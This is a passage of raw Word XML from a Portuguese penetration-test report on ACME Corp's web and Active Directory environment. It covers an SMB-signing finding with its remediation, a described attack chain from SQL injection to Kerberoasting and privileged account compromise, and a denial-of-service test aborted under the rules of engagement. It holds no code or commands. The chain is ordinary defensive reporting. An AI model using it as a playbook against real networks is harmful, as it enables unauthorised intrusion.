        <w:t xml:space="preserve">Hosts sem assinatura SMB permitem relay de autenticação NTLM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> habilitar/forçar SMB signing via GPO; desabilitar NTLM onde possível.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ 5. Validação de impacto (cadeia de exploração)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Demonstrar impacto de negócio encadeando os achados, sem ações destrutivas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cadeia demonstrada:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLi (3.1) → vazamento de credenciais de aplicação → pivô para a rede
interna (VPN) → Kerberoasting (4.1) → comprometimento de conta privilegiada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O resultado evidencia caminho plausível de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">exposição de toda a base de clientes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e de
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">controle administrativo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> do domínio de teste. Nenhum dado de produção foi alterado ou exfiltrado;
as PoCs limitaram-se à leitura mínima necessária para comprovar o impacto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ 6. Teste de stress de camada 7 (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avaliar resiliência a DoS de aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Abortado conforme as regras de engajamento.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes de negação de serviço estavam fora do
escopo autorizado para o ambiente compartilhado; a tarefa foi encerrada sem execução para preservar
a disponibilidade. Recomenda-se um teste dedicado em ambiente isolado.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Avaliação de Segurança Ofensiva — ACME Corp (Web + AD)</dc:title>
  <dc:creator>Suricatoos</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-12T18:10:27.922Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-12T18:10:27.922Z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